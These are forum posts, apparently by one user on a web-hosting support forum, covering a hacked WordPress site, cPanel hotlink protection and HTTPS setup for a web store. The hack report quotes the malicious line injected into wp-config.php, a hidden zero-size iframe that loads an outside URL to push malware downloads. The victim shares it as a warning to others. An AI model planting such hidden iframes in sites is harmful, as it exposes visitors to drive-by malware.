Hmmm...I'll check it out then. Sorry about that. The only time I'd ever use it is if there was a problem though. Again, I don't pay much attention most of the time to my site or anything else. I get a bit busy RL and this is sort of on the back burner for most of the time.

Nah it's okay. I just wanted you guys to be aware of the situation. I didn't think I'd find it that fast though. But it was simply a matter of finding which file had been recently edited. BTW, what's up with you guys not being on MSN or on AIM anymore? Did I miss something? I blog very...rarely...so I never really check up on things here unless there's some sort of a problem.

I was on 2.0.4 and upgraded to 2.0.5 while I was tracking this problem.

Hey there, I emailed you guys about it but I figure others might want to know. My WP site was hacked a few days ago. What was happening was that when you'd hit the site with Safari or even Firefox, it would try to download a file called xpl.wmf. It also would give pop-up messages about downloading a "disk cleaner" whenever you hit the admin menu. I finally tracked down the culprit. My wp-config.php file had been modified. At the very end of the file was the follwing line: ><iframe src="http://ltds.biz/go.php?id=1874&user_name=ziggen" width=0 height=0></iframe> Which, as you can see, is bringing something up. Anyway, I made a copy of the offending file, erased it and re-upped it. Everything (so far as I can see) is now working as it should. The problem was, however, that my files were not writable. So I have no idea how they got to it or re-wrote it to include that line at the end. It must have happened only two days ago as the file date was modified on 11/19/06, and I only noticed it happening yesterday. I didn't have time to try to track it down until today though. Any others experienced with this sort of thing? I'd love to know. Also, not sure if this is in the right forum but I figured maybe everyone should know in case there are others out there with the same problem.

Hey there, As lots of others here have discovered, Myspace idiots are hotlinking pictures from various sites - including mine. I really want to block them. How? My site is Wordpress. I'm using Cpanel hotlink protection and it isn't working. Just the default ones: Site enabled: my site list Extensions to allow: jpg,jpeg,gif,png,bmp (is this stuff that we allow to be hotlinked or stuff we are blocking?) URL to redirect to: full http:// path to blocking/don't steal picture (it works, I've tried it). Allow direct requests: unchecked. Any idea why this isn't working?

Hey all, I did a search on this subject but it was a little confusing to me. I just have a few HTTPS questions: 1) I want to open a store at my site (theoretically - I'm actually opening another account here soon for the store, but I want to test it on my site first). I will need an HTTPS server running for credit card transactions, obviously. I'm using X-cart and it works great. But when I go to the https://mysiteaddress.com/storename, I get a "site not configured" cPanel page. If I try to use the HTTPS line for credit card transactions, I get a 404. Is there already an HTTPS server running on my site here at TCH? 2) If there is, how do I make it work? Do I have to purchase one or is there one already running with my account? 3) Are there free ones? I saw there are some free ones online but I'm just looking into it now and it just all appears to be a bit complex. 4) Anything else I need to know what to do with cPanel and configs for it? Any help is appreciated. Since I'm running it on a test site right now, I don't feel like dishing out $85 for something I'll be using only on another site anyway. Thanks for any info! B. P.S. The reason I'm switching to this host for the store is because my partner got fed up with the last one. I just want to thank TCH for really being the best I've ever seen. You wouldn't believe the trouble we've had with the last host. They wouldn't even answer emails for two months, and they had no live chat or any other contact info. I don't want to turn this into a badmouth session about the other host - because I'm sure as hell going to do that on blogspot instead. But I just wanted to tell you guys how much it means to me to be able to tell my partner "Hey, my personal site host is the best. Let's move there, and here's why...", and know that it's bloody well true. So to all the people at TCH, a big thank you and appreciation from me.
